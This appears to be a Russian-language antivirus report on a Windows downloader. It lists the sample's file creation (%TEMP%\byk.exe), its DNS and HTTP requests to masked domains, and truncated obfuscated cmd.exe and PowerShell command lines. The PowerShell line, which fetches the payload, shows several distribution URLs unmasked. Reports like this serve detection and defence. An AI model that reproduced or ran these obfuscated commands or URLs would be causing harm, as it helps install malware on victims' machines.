Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c %TMp:~ -8, 1%^m^d; ; ; ; /v^: ; /r " ; ;(^seT ^ ^j^qzL=Ud^j svJ ^P E ^hkn^ R^IU^ ^2Py ^kC^Z^ kb^q 1^2^o 2^I^D ^u1^L^ DQr Hg^7^ kve^ ^y^XM m^ ^o^ C^Ef ^u1r^}UN6}RKN^{N^O^ hgn^iczert^...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\byk.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://ei####lfahim.com/Kk4G
- http://cc#.com.uy/pot
- http://my####thbeta.com/Ug5OuOoN
- http://tr####ampung.com/AEk
UDP
- DNS ASK as###medvil.ru
- DNS ASK ei####lfahim.com
- DNS ASK cc#.com.uy
- DNS ASK my####thbeta.com
- DNS ASK tr####ampung.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c %TMp:~ -8, 1%^m^d; ; ; ; /v^: ; /r " ; ;(^seT ^ ^j^qzL=Ud^j svJ ^P E ^hkn^ R^IU^ ^2Py ^kC^Z^ kb^q 1^2^o 2^I^D ^u1^L^ DQr Hg^7^ kve^ ^y^XM m^ ^o^ C^Ef ^u1r^}UN6}RKN^{N^O^ hgn^iczert^...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' ; ; ; ; /v: ; /r " ; ;(^seT ^ ^j^qzL=Ud^j svJ ^P E ^hkn^ R^IU^ ^2Py ^kC^Z^ kb^q 1^2^o 2^I^D ^u1^L^ DQr Hg^7^ kve^ ^y^XM m^ ^o^ C^Ef ^u1r^}UN6}RKN^{N^O^ hgn^iczert^xy^0a^fXNc^aIM}hw^Fkq4pa...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $wTw='tDa';$Zsf='http://as###medvil.ru/DDTlD@http://eissaalfahim.com/Kk4G@http://ccv.com.uy/pot@http://myhealthbeta.com/Ug5OuOoN@http://translampung.com/AEk'.Split('@');$zRj=([System.IO.Path]::...
